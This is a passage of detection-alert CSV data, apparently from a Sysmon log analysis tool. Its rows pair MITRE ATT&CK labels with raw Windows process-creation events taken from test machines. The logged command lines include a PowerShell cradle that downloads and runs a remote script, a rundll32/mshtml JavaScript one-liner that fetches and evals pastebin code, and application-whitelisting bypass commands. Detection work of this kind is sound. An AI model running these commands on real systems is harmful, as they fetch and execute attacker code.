<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1557680511.00795,2019-05-12T21:01:51.007950+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( &quot;C:\Windows\System32\pcalua.exe&quot; -a c:\Windows\system32\calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T17:01:50.781015Z"">
</TimeCreated>
<EventRecordID>16497</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2012"" ThreadID=""300"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 17:01:50.781</Data>
<Data Name=""ProcessGuid"">365ABB72-517E-5CD8-0000-001024D61700</Data>
<Data Name=""ProcessId"">2952</Data>
<Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Program Compatibility Assistant</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\pcalua.exe&quot; -a c:\Windows\system32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=ABB6319976D9702E0C80978D51C0AEE88A33D201,MD5=D652BA887500816431566B524292ECCB,SHA256=65446AF2997779DB6CDAEFB2ABC2994CA9F2A2477C882BC3A5F828BBFFB83CEE,IMPHASH=256CD8CEDFD4FCB3BC9DB32E27E5923A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
<Data Name=""ParentProcessId"">3788</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:23.507565Z"">
</TimeCreated>
<EventRecordID>4912</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:23.380</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
<Data Name=""ProcessId"">3000</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
<Data Name=""ParentProcessId"">5816</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564126781.211276,2019-07-26T11:39:41.211276+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe &gt; nul &amp;&amp; %%TEMP%%\out.exe javascript:&quot;\..\mshtml RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WinHttp.WinHttpRequest.5.1&quot;);h.Open(&quot;GET&quot;,&quot;http://pastebin.com/raw/y2CjnRtH&quot;,false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im out.exe&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-26T07:39:14.935857Z"">
</TimeCreated>
<EventRecordID>4353</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5924"" ThreadID=""6056"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-26 07:39:14.853</Data>
<Data Name=""ProcessGuid"">747F3D96-AE22-5D3A-0000-001004D84E00</Data>
<Data Name=""ProcessId"">5548</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe &gt; nul &amp;&amp; %%TEMP%%\out.exe javascript:&quot;\..\mshtml RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WinHttp.WinHttpRequest.5.1&quot;);h.Open(&quot;GET&quot;,&quot;http://pastebin.com/raw/y2CjnRtH&quot;,false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im out.exe&quot;,0,true);}</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-ABD5-5D3A-0000-0020EB990F00</Data>
<Data Name=""LogonId"">0xf99eb</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-AE22-5D3A-0000-001096B24E00</Data>
<Data Name=""ParentProcessId"">1504</Data>
<Data Name=""ParentImage"">C:\Windows\hh.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\hh.exe&quot; C:\Users\IEUser\Desktop\Fax Record N104F.chm</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1074] Data Staged - Process,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:23.507565Z"">
</TimeCreated>
<EventRecordID>4912</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:23.380</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
<Data Name=""ProcessId"">3000</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
<Data Name=""ParentProcessId"">5816</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.523670Z"">
</TimeCreated>
<EventRecordID>16395</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.523</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ProcessId"">3856</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.523670Z"">
</TimeCreated>
<EventRecordID>16395</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.523</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ProcessId"">3856</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.523670Z"">
</TimeCreated>
<EventRecordID>16395</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.523</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ProcessId"">3856</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553028075.144276,2019-03-20T00:41:15.144276+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:41:15.144276Z"">
</TimeCreated>
<EventRecordID>1966251</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:36:04.206</Data>
<Data Name=""ProcessGuid"">365ABB72-52B4-5C91-0000-0010355B0100</Data>
<Data Name=""ProcessId"">1628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-528D-5C91-0000-001062560000</Data>
<Data Name=""ParentProcessId"">484</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot;)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T11:43:36.306601Z"">
</TimeCreated>
<EventRecordID>417079</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3500"" ThreadID=""4688"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 11:43:36.303</Data>
<Data Name=""ProcessGuid"">747F3D96-D8E8-5F8A-0000-00102CEF7200</Data>
<Data Name=""ProcessId"">840</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
<Data Name=""LogonId"">0xa09d1</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
<Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab})",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-14T12:17:14.614739Z"">
</TimeCreated>
<EventRecordID>10674</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2004"" ThreadID=""4480"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-14 12:17:14.447</Data>
<Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
